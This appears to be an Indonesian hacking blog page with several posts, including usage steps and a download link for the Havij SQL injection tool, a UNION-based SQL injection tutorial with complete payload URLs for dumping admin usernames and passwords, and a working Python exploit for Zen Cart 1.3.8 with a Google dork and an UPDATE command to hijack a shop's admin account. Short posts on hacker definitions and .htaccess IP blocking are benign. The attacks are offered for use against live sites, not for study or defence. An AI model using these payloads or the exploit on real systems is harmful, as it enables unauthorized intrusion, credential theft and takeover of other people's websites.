Havij 1.06 – Advanced SQL Injection Tool

1 Komentar

Havij 1.06 - Advanced SQL Injection Tool

Havij
—–
Version 1.06
Copyright © 2009
By r3dm0v3
http://r3dm0v3.persianblog.ir
r3dm0v3[4t]yahoo[.]com
Please tell me your offers and report bugs.
Check for updates!

Licence
——-
This program is free software. I hope it be useful for you.
This software is provided “as is” without warranties.
Feel free to share and distribute it anywhere but please keep the files original!

What’s New?
———–
-Oracle database
-MsAccess database
-Find Admin
-Proxy support
-Filtering enabled
-update/delete/insert
-Group_concat for mysql
-New look
-User agent header
-Load cookie from page
-Analyze method made better (specially for mysql)
-Many bugs fixed.

Features
——–
Data Bases: MsSQL 2000/2005 with error, MsSQL 2000/2005 no error, MySQL, Oracle, MsAccess
Find admin page
Getting Information
Getting Tables, Columns, Data
Command Executation (mssql only)
Reading Files (mysql only)
insert/update/delete data
Proxy support
Guessing tables and columns in mysql<5
Fast getting tables and columns for mysql.
Checking different injection syntaxes.
Changing http headers
Bypass illegal union.
Avoid using strings.

Cara Pakai :

1. Masukkan situs target ke kolom target, kemudian klik ” Analyze ”
2. Tunggu hingga proses scanning selesai, di situ akan kelihatan IP, Web Server, DB type dll….
3. Setelah itu, bila beruntung anda akan mendapatkan hole dari site tersebut, untuk bisa di inject.
4. Pada tab ” Tables “, klik ” Get Tables “, tunggu lagi hingga proses selesai, nanti akan kelura nama2 table dari database tersebut,…
5. Jika sudah selesai, ceklis Tables yang berhubungan dengan ADMIN, contoh ” Users “, ” Account “, ” Admin “, dll…sesuaikan sendiri.
5. Setelah itu, klik ” Get Columns “, tunggu hingga proses selesai, nanti akan muncul columns yanga ada pada Tables tadi, contoh ” password “, ” username “, ” user_id”, dll, sesuaikan sendiri..
6. Tahap yang penting adalah mendapatkan data pada columns tadi, ceklis salah satu columns, kemudian klik ” Get Data” , tunggu prosesnya, nanti akan terlihat data-data berupa userid, password ( biasanya MD5 )..dll
7. Setelah selesai mendapatkan Data, misal password benrbentuk MD5, klik tab MD5 ( v1.08) untuk crackingnya.
8. Langkah terakhir klik tab ” Find Admin “, untuk mencari admin page dari site target anda..jika proses berhasil akan keluar URL yang menuju ke Admin Pagenya, kemudian Go to URL,…
9. Jika Admin Page sudah terbuka, tinggal masukkan user Adminnya beserta Password yang didapat tadi,…login, dan semoga berhasil,…..

Download Link :

http://www.4shared.com/file/258231797/79214c44/Havij_108.html

Pengertian Hacker dan Cracker

Tinggalkan komentar

1. Hacker

Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

2. Cracker

Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.

Hirarki / Tingkatan Hacker

Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :

1.Elite

Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.

2.Semi Elite

Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.

3.Developed Kiddie

Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4.Script Kiddie

Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

5.Lammer

Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak

Block IP Address Dengan Menggunakan htaccess

Tinggalkan komentar

Jika anda mempunyai website dan ingin mengeblok IP Address tertentu agar IP Address tersebut tidak bisa mengakses website anda, anda cukup membuat file dengan nama .htaccess yang di letakkan pada direktori utama website anda.
caranya adalah sebagai berikut :
1. Buat file dengan nama .htaccess dan isi file tersebut dengan salah satu script di bawah ini :
Untuk melakukan block pada satu IP Address

order allow,deny
deny from 127.0.0.1
allow from all

Untuk melakukan block Multiple IP Address

order allow,deny
deny from 127.0.0.1
deny from 127.0.0.2
deny from 127.0.0.3
allow from all

Untuk melakukan block pada range IP Address 127.0.0.0 sampai 127.0.0.255

deny from 127.0.0

Untuk melakukan block menurut hostname IP Address

deny from isp_name.com

*. Ganti contoh IP Address di atas dengan IP Address yang anda inginkan.

2. Setelah itu simpan dan letakkan pada direktori utama website anda.

Untuk mengembalikan seperti semula anda tinggal menghapus script tersebut atau menghapus file .htaccess anda.

Selesai Smile

Hacking Website dengan SQL-injection

3 Komentar

assalamualaikum

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: atau
comments: /* atau
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal:

[site]/berita.php?id=100

Tambahkan karakter pada akhir url atau menambahkan karakter “” untuk melihat apakah ada pesan error.
contoh:

[site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal:

[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error…
misal:

[site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi

[site]/berita.php?id=-100+order+by+8--

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:

[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:

[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8--

atau

[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema

===========
=step Empat:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir
Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi : http://tryer.t35.com/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Tujuh:=
==============

tahap terakhir mencari halaman admin atau login .

Silahkan DI b4c4 dah dipelajari Kaka  .

By : gonzhack

Bugs Zen Cart

15 Komentar

assalamualaikum

Langsung Aja Dibaca

buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#   DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#   DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
   global a, b
   for param in sys.argv:
      if(param == '-'+name): return str(sys.argv[b+1])
      b = b + 1
   if(need):
      print '\n#error', "-"+name, 'parameter required'
      exit(1)

if (len(sys.argv) < 2):
   print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
   """
   exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
      print '>> success (', cmd, ")"
   else:
      print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <–enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name=’adminz’, admin_email=’admin@shopadmin.com’, admin_pass=’617ec22fbb8f201c366e9848c0eb6925:87′ WHERE admin_id=’1′; trus enter

kalo berhasil maka akan muncul kayak ini :

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya

Bugs Zen Cart

Bugs Zen Cart

kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew

sekian dan terima kasih

Kalo berhasil ada tulisan ini

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

Kalo gagal ada tulisan gini

>> failed, be sure to end with ; ( UPDATE admin SET admin_name='adminz', admin_e
mail='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHE
RE admin_id='1';

Atau ini

Traceback (most recent call last):
 File "C:\Documents and Settings\Toshiba\Desktop\zen.py", line 53, in
 if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
 File "C:\Python25\lib\urllib2.py", line 121, in urlopen
 return _opener.open(url, data)
 File "C:\Python25\lib\urllib2.py", line 374, in open
 response = self._open(req, data)
 File "C:\Python25\lib\urllib2.py", line 392, in _open
 '_open', req)
 File "C:\Python25\lib\urllib2.py", line 353, in _call_chain
 result = func(*args)
 File "C:\Python25\lib\urllib2.py", line 1101, in http_open
 return self.do_open(httplib.HTTPConnection, req)
 File "C:\Python25\lib\urllib2.py", line 1076, in do_open
 raise URLError(err)
urllib2.URLError: 

By : Ichito Bandito